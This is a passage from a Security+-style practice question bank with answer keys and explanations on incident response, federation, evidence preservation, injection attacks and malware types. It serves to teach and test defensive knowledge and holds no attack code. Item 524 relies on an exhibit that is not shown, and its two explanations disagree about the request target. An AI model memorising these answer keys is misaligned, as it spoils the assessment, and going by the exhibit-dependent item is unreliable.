Option A is wrong because shutting down the finance application immediately would avoid the risk but is not feasible as the business cannot stop using the application, making this an impractical business decision. Option C is wrong because risk transfer requires a third party to accept financial liability (e.g., through insurance or outsourcing), and asking a vendor to 'guarantee no incident' is not a valid risk transfer mechanism—vendors typically do not assume operational risk for unpatched vulnerabilities. Option D is wrong because accepting risk without analysis or compensating controls is negligent; the vulnerability is known and the application is critical, so acceptance should only be considered after a formal risk assessment and only if the residual risk is within the organization's appetite, not automatically due to a delayed patch.

513
MCQ · medium

A manufacturer needs to grant a partner company access to a procurement portal. Partner users should authenticate with their own identity provider, and the manufacturer does not want to create local passwords for each partner employee. Which design best supports this?

A. Create local accounts for every partner user and reset passwords manually when staff changes occur.
B. Share one VPN credential with the partner organization and let them manage access internally.
C. Use NTLM pass-through authentication to avoid setting up trust relationships.
D. Establish federation with SAML or OIDC and support just-in-time provisioning for partner users.
Answer: D

Federation lets partner users authenticate through their own identity provider while the portal trusts that assertion and creates accounts as needed.

Why this answer

Federation with SAML or OIDC allows the partner company to use its own identity provider for authentication, eliminating the need for local passwords. Just-in-time provisioning automatically creates user accounts in the manufacturer's procurement portal upon first successful authentication, ensuring access is granted without manual account management. This design supports secure cross-organization trust without sharing credentials or maintaining duplicate user stores.

Exam trap

The trap here is that candidates may see NTLM pass-through authentication (Option C) as a viable cross-organization solution, not realizing that it is a legacy Windows mechanism that depends on a direct Active Directory trust between domains and provides no cross-organization federation, whereas federation with SAML/OIDC is the correct modern approach for integrating an external identity provider.

How to eliminate wrong answers

Option A is wrong because creating local accounts for every partner user and manually resetting passwords on staff changes is operationally unsustainable, violates the principle of least privilege, and introduces password management overhead that federation avoids. Option B is wrong because sharing one VPN credential violates the principle of non-repudiation and accountability, as it cannot distinguish individual users, and the partner cannot securely manage internal access without per-user authentication. Option C is wrong because NTLM pass-through authentication is a legacy Windows protocol that requires direct trust relationships between domains, does not support modern identity federation standards like SAML or OIDC, and is unsuitable for cross-organizational access without establishing a trust.

514
MCQ · medium

A security analyst notices unusual outbound traffic from a server that normally only communicates with internal clients. The traffic is encrypted and goes to an external IP address not on any blocklists. The analyst also finds a new scheduled task on the server that runs a PowerShell script. Which of the following best describes the analyst's immediate next step in the incident response process?

A. Disconnect the server from the network to contain the potential breach.
B. Wipe the server and restore from a known good backup.
C. Run a full antivirus scan on the server to identify malware.
D. Inform the legal department and law enforcement.
Answer: A

This is correct because containment is the immediate priority in incident response to stop the threat from spreading or causing more harm. Disconnecting the network cable or disabling the network interface is a simple and effective containment action.

Why this answer

According to standard incident response frameworks such as NIST SP 800-61, containment is one of the first and most critical steps after detecting a potential compromise. The unusual encrypted outbound traffic and the unauthorized scheduled task are strong indicators of compromise (IOCs). Disconnecting the server from the network immediately helps prevent further data exfiltration, lateral movement, or additional damage.

Other actions, such as running a scan, wiping the server, or notifying legal, are performed later in the process after containment and evidence preservation.

515
Multi-Select · hard

A customer portal team must keep an unsupported Linux appliance online for 60 days while a replacement is built. The appliance processes payment tokens and cannot be patched until the vendor certifies the new image. Which two actions best reduce the residual risk during the 60-day window? Select two.

Select 2 answers
A. Move the appliance onto the flat user VLAN so the team can monitor it with standard workstation tools.
B. Restrict network paths to only the required upstream and downstream systems through firewall allow-lists.
C. Declare the risk fully accepted and make no configuration changes until the replacement is ready.
D. Add compensating controls such as application allow-listing, enhanced logging, and SIEM alerting.
E. Disable logging because the appliance is already at capacity and logs can slow it down.
Answers: B, D

This limits attack surface by allowing only necessary traffic, which directly reduces the likelihood of exploitation.

Why this answer

Option B is correct because restricting network paths to only required upstream and downstream systems via firewall allow-lists reduces the attack surface by limiting the appliance's exposure to unnecessary network traffic. This is a classic network segmentation compensating control that mitigates the risk of lateral movement from an unpatched, vulnerable system. By enforcing strict ingress/egress rules, the team can prevent unauthorized access and contain potential exploits during the 60-day window.

Exam trap

The trap here is that candidates may think 'accepting the risk' (Option C) is the only valid response when a patch cannot be applied, but CompTIA expects you to recognize that compensating controls must still be implemented to reduce residual risk to an acceptable level.

516
MCQ · easy

A laptop is suspected of being compromised, and the responder wants to preserve useful evidence before shutting it down. What should be done first?

A. Power off the laptop immediately to stop all attacker activity.
B. Capture volatile data such as memory and running processes if possible.
C. Install a new antivirus product before collecting evidence.
D. Reimage the laptop so the user can return to work quickly.
Answer: B

Capturing volatile data is the best first step when preserving evidence matters. Memory can contain malware code, encryption keys, active network sessions, and signs of lateral movement that disappear after shutdown. In incident response, responders try to preserve the most time-sensitive evidence before disrupting the system, as long as doing so is safe and approved.

Why this answer

Option B is correct because volatile data (e.g., RAM contents, running processes, network connections) is lost when the laptop is powered off. Capturing this data first preserves critical evidence of the attacker's current activity, such as malware in memory or active network connections, which is essential for forensic analysis. This aligns with the forensic principle of order of volatility, where the most volatile data is collected first.

Exam trap

The trap here is that candidates often think immediate shutdown stops the attack, but CompTIA tests the forensic principle that volatile data must be captured first to preserve evidence that disappears on power loss.

How to eliminate wrong answers

Option A is wrong because immediately powering off the laptop destroys volatile data (e.g., memory, running processes, network connections) that may contain critical evidence of the compromise, such as active malware or attacker commands. Option C is wrong because installing a new antivirus product modifies the system state (e.g., writes files, changes registry entries), potentially overwriting or destroying existing evidence, and is not a forensic best practice. Option D is wrong because reimaging the laptop completely wipes all data, including evidence of the compromise, making forensic analysis impossible and violating evidence preservation protocols.

517
Multi-Select · medium

A SIEM rule flags a Linux server because it makes outbound HTTPS connections to the same cloud IP every 15 minutes. The server runs an approved patch agent that should check in on a regular schedule. Which two checks best validate whether the alert is a false positive? Select two.

Select 2 answers
A. Compare the process name, parent process, and digital signature to the approved agent baseline.
B. Verify the destination domain and certificate chain against vendor documentation.
C. Assume the traffic is benign because it happens on a fixed schedule.
D. Suppress all alerts from the host permanently after this one event.
E. Stop collecting logs from the server so the same alert does not recur.
Answers: A, B

Correct because a known process tree and valid signature are strong indicators that the behavior belongs to the sanctioned patch agent. This helps confirm whether the activity matches expected system behavior.

Why this answer

Option A is correct because comparing the process name, parent process, and digital signature against the approved agent baseline directly validates that the traffic originates from the legitimate patch agent and not from malware masquerading as the agent. This is a standard host-based validation technique to confirm the source process integrity before investigating network alerts.

Exam trap

The trap here is that candidates may think a fixed schedule alone is sufficient to dismiss the alert (Option C), but CompTIA expects you to validate both the source process integrity and the destination legitimacy before concluding a false positive.

518
MCQ · easy

Before applying a critical patch to a production application server, which action best reduces the risk of extended downtime if the patch fails?

A. Apply the patch immediately without testing so the system is protected sooner.
B. Create a verified backup or rollback plan before making the change.
C. Disable logging so the patch process uses fewer resources.
D. Postpone the patch indefinitely until all business users request it.
Answer: B

A verified backup or rollback plan is the best safeguard because it gives the team a way to recover quickly if the patch causes instability. In patch management, resilience matters as much as speed. Planning for restoration before the change reduces downtime, supports change control, and helps the business continue operating if the update introduces problems.

Why this answer

Creating a verified backup or rollback plan before applying a critical patch ensures that if the patch causes unexpected failures or incompatibilities, the system can be restored to its previous stable state quickly. This directly reduces the risk of extended downtime by providing a reliable recovery path, which is a fundamental principle of change management and risk mitigation in production environments.

Exam trap

The trap here is that candidates may think immediate patching (Option A) is always the best security practice, but the question specifically asks about reducing the risk of extended downtime if the patch fails, not about security speed, so the correct answer focuses on recovery preparedness.

How to eliminate wrong answers

Option A is wrong because applying the patch immediately without testing bypasses validation and increases the likelihood of a failure that could cause extended downtime, as there is no rollback plan or backup to recover from. Option C is wrong because disabling logging does not reduce downtime risk; it actually hinders troubleshooting by removing forensic evidence needed to diagnose patch failures, and resource savings are negligible compared to the risk of extended outage. Option D is wrong because postponing the patch indefinitely leaves the system vulnerable to known exploits, and waiting for all business users to request it is impractical and violates security best practices for timely patch management.

519
MCQ · easy

A support portal has a search field that accepts customer last names. After a tester enters a single quote, the application returns a database syntax error. Which attack is the tester most likely trying to verify?

A. Cross-site scripting (XSS)
B. SQL injection
C. CSRF
D. SSRF
Answer: B

SQL injection happens when user input is inserted into a database query without proper validation or parameterization. A single quote causing a syntax error is a common sign that the input is affecting the SQL statement.

Why this answer

The tester is most likely trying to verify a SQL injection vulnerability. Entering a single quote into a search field that interacts with a database can break the SQL query syntax if user input is improperly sanitized, causing the database to return a syntax error. This error indicates that the input is being directly concatenated into a SQL statement, confirming the presence of a SQL injection flaw.

Exam trap

The trap here is that candidates may confuse the database syntax error with a client-side script execution indicator, leading them to choose XSS, but the error is a direct result of SQL syntax breakage, not script injection.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, and a database syntax error is not a typical indicator of XSS; XSS would manifest as script execution in the browser, not a backend database error. Option C is wrong because Cross-Site Request Forgery (CSRF) exploits the trust a site has in a user's browser by tricking the user into making unintended requests, and a single quote in a search field does not trigger a CSRF attack or produce a database syntax error. Option D is wrong because Server-Side Request Forgery (SSRF) involves manipulating the server to make requests to internal or external resources, and a database syntax error from a single quote is not related to SSRF; SSRF would typically involve URL manipulation or protocol-based attacks.

520
MCQ · medium

A help desk technician reports that a user's account was locked out three times overnight. The security team reviews the authentication logs and discovers that the lockouts resulted from failed login attempts originating from a single external IP address, each attempt using a slightly different variation of the user's password. Which of the following should the security analyst do FIRST?

A. Block the external IP address at the perimeter firewall.
B. Disable the user account and require a password reset.
C. Investigate the user's recent activity for signs of compromise.
D. Increase the account lockout threshold to prevent future lockouts.
Answer: C

Correct. The analyst should first gather contextual information about the user's account, recent successful logins, and any other anomalous behavior. This investigation determines whether the account was actually breached and informs subsequent containment and remediation steps.

Why this answer

Option C is correct because the pattern of failed login attempts from a single external IP using password variations suggests a brute-force or password-spraying attack. The security analyst must first investigate the user's recent activity to determine if the account was successfully compromised or if the attacker gained access via a successful login attempt before the lockouts occurred. This aligns with the incident response process, where identification and analysis precede containment actions like blocking IPs or resetting passwords.

Exam trap

The trap here is that candidates may jump to immediate containment (blocking the IP or disabling the account) without first verifying whether the attack succeeded, which violates the incident response principle of 'identify before contain' and could disrupt legitimate access or miss evidence of a breach.

How to eliminate wrong answers

Option A is wrong because blocking the external IP at the perimeter firewall is a containment step that should be taken after confirming the attack is malicious and not a false positive (e.g., a legitimate user with a forgotten password). Option B is wrong because disabling the user account and requiring a password reset is premature without first verifying that the account was actually compromised; the lockouts may have prevented any unauthorized access. Option D is wrong because increasing the account lockout threshold weakens security posture and does not address the root cause; it may allow more brute-force attempts before lockout, increasing the risk of successful password guessing.

521
MCQ · medium

After an endpoint cleanup, an EDR agent shows inconsistent results: a suspicious process does not appear in normal task listings, a file in System32 is hidden from user-mode tools, and some security logs stop recording events at the same time. Which malware type best matches these symptoms?

A. Rootkit, because it hides processes, files, or activity from standard system tools.
B. Spyware, because it secretly collects user information and browser data.
C. Worm, because it spreads quickly through network shares and email attachments.
D. Trojan, because it masquerades as legitimate software to trick the user.
Answer: A

Rootkits are designed to conceal malware and attacker activity by altering how the operating system reports processes, files, or logs.

Why this answer

A rootkit is designed to hide its presence and the presence of associated processes, files, and system activities from standard operating system tools and user-mode APIs. The symptoms described—a process invisible to task listings, a hidden file in System32, and security logs ceasing to record events—are classic indicators of kernel-mode or user-mode rootkit behavior that intercepts system calls to filter out its own artifacts.

Exam trap

The trap here is that candidates confuse the 'hiding' behavior of a rootkit with the 'deception' of a trojan or the 'collection' of spyware, but only a rootkit specifically subverts the OS's own APIs to conceal its presence from standard administrative tools.

How to eliminate wrong answers

Option B is wrong because spyware focuses on covert data collection (e.g., keystrokes, browsing habits) and does not inherently hide processes, files, or disable security logging. Option C is wrong because a worm's primary characteristic is self-replication and network propagation, not stealth mechanisms to evade detection by task manager or hide files in System32. Option D is wrong because a trojan relies on social engineering to appear legitimate, but its core behavior does not include the systematic hiding of processes and files from system tools or the suppression of security event logs.

522
Multi-Select · medium

A finance workstation is suspected of running malware. It is still powered on, the user is logged in, and the network cable is connected. Which two actions best preserve volatile evidence before shutdown? Select two.

Select 2 answers
A. Capture RAM or a volatile memory image before the system is powered off
B. Record running processes, open network connections, and logged-on users
C. Shut the workstation down immediately and restart it cleanly
D. Run a disk defragmentation utility to prepare for imaging
E. Uninstall the suspected malware before collecting any evidence
Answers: A, B

Memory can contain running processes, network sessions, encryption keys, and malware artifacts that disappear on shutdown.

Why this answer

Option A is correct because capturing RAM or a volatile memory image preserves data that is lost when the system is powered off, such as running processes, encryption keys, and network connections. This is a fundamental step in forensic incident response to ensure volatile evidence is not destroyed before analysis.

Exam trap

The trap here is that candidates may think immediate shutdown is safe or that disk defragmentation is a valid preparation step, but both destroy or alter evidence, violating forensic preservation principles.

523
MCQ · easy

After installing a free PDF-to-Word utility from an unofficial website, a user's laptop starts sending data to an unknown server and the security agent is disabled. Which malware type best fits?

A. Trojan
B. Worm
C. Spyware
D. Rootkit
Answer: A

A trojan disguises itself as useful software while secretly installing malicious behavior.

Why this answer

A Trojan is malware disguised as legitimate software, such as a free PDF-to-Word utility, that performs malicious actions without the user's knowledge. In this scenario, the Trojan exfiltrates data to an unknown server and disables the security agent, which are classic Trojan behaviors—unlike self-replicating worms or passive spyware. The user's intentional download from an unofficial website is the typical infection vector for Trojans.

Exam trap

The trap here is that candidates may confuse 'spyware' with 'Trojan' because both can steal data, but the key distinction is that a Trojan actively performs multiple malicious actions (including disabling security) and requires user execution, whereas spyware is typically passive and does not disable defenses.

How to eliminate wrong answers

Option B (Worm) is wrong because worms self-replicate and spread across networks without user interaction, whereas this malware required the user to download and execute the utility. Option C (Spyware) is wrong because spyware primarily passively monitors and collects data without actively disabling security agents or performing destructive actions. Option D (Rootkit) is wrong because rootkits specifically hide their presence by modifying the operating system kernel or drivers, and while disabling a security agent could be a rootkit behavior, the initial infection vector (a downloaded utility) and data exfiltration are more characteristic of a Trojan.

524
MCQ · easy

Based on the exhibit, which attack is the developer most likely observing?

A. Cross-site scripting (XSS)
B. Server-side request forgery (SSRF)
C. SQL injection
D. CSRF
Answer: B

The application is being tricked into making a request to an internal metadata endpoint using a user-controlled URL parameter. That is server-side request forgery. SSRF is common in cloud environments because it can expose instance metadata, credentials, or internal services that should not be reachable from the outside.

Why this answer

The developer is most likely observing a server-side request forgery (SSRF) attack because the log shows the application making an outbound HTTP request to an internal IP address (10.0.0.1) initiated by user-supplied input (the 'url' parameter). SSRF occurs when an attacker manipulates the server to send crafted requests to internal or external resources, bypassing access controls. The exhibit's pattern of a server-side request to a private IP range directly indicates SSRF, not client-side or database attacks.

Exam trap

The trap here is that candidates confuse SSRF with CSRF because both involve requests, but SSRF is server-initiated while CSRF is client-initiated; the key clue is the server making a request to a private IP, not the user's browser.

How to eliminate wrong answers

Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not server-side requests to internal IPs; the log shows no script execution or client-side payload. Option C is wrong because SQL injection targets database queries via input fields, but the log shows an HTTP request to an internal IP, not a database error or query manipulation. Option D is wrong because CSRF (Cross-Site Request Forgery) tricks a user's browser into performing unintended actions on an authenticated site, whereas the exhibit shows the server itself making the request, not the client's browser.

525
MCQ · medium

An EDR console alerts that powershell.exe launched with an encoded command on a finance workstation, and a minute later the host begins making repeated outbound connections to an unfamiliar IP address. What is the best initial response?

A. Run a full antivirus scan first and leave the workstation online so the user can keep working.
B. Isolate the workstation through the EDR platform and preserve logs and volatile evidence for investigation.
C. Power off the workstation immediately to ensure the malicious process stops.
D. Create a permanent firewall rule that allows the unfamiliar IP address so you can observe more traffic.
Answer: B

Encoded PowerShell combined with outbound beaconing is a strong indicator of active malicious behavior. Isolating the endpoint through EDR contains the incident while preserving the host’s state for analysis. This approach is better than pulling the plug because it reduces attacker activity without unnecessarily destroying volatile evidence. The analyst can then collect logs, memory, and process details before remediation or reimaging.

Why this answer

Option B is correct because isolating the workstation via the EDR platform stops the immediate threat (the malicious outbound connections) while preserving volatile evidence (e.g., running processes, network connections, memory contents) and logs for forensic analysis. This aligns with the incident response principle of containment before eradication, and EDR isolation typically uses a host-based firewall rule to block all traffic except to the EDR management server, ensuring the host remains accessible for investigation.

Exam trap

The trap here is that candidates confuse immediate containment (isolation) with eradication (antivirus scan) or evidence preservation (shutdown), but the SY0-701 exam emphasizes that isolation via EDR is the best initial response because it stops the threat without destroying volatile data.

How to eliminate wrong answers

Option A is wrong because running a full antivirus scan while the host remains online allows the attacker to continue exfiltration or lateral movement, and antivirus may miss fileless or encoded PowerShell attacks that never touch disk. Option C is wrong because powering off the workstation destroys volatile evidence (e.g., memory-resident malware, active network connections, process trees) and may prevent forensic analysis of the attack chain. Option D is wrong because creating a permanent firewall rule to allow the unfamiliar IP address would actively assist the attacker by ensuring uninterrupted command-and-control communication, violating the containment principle.
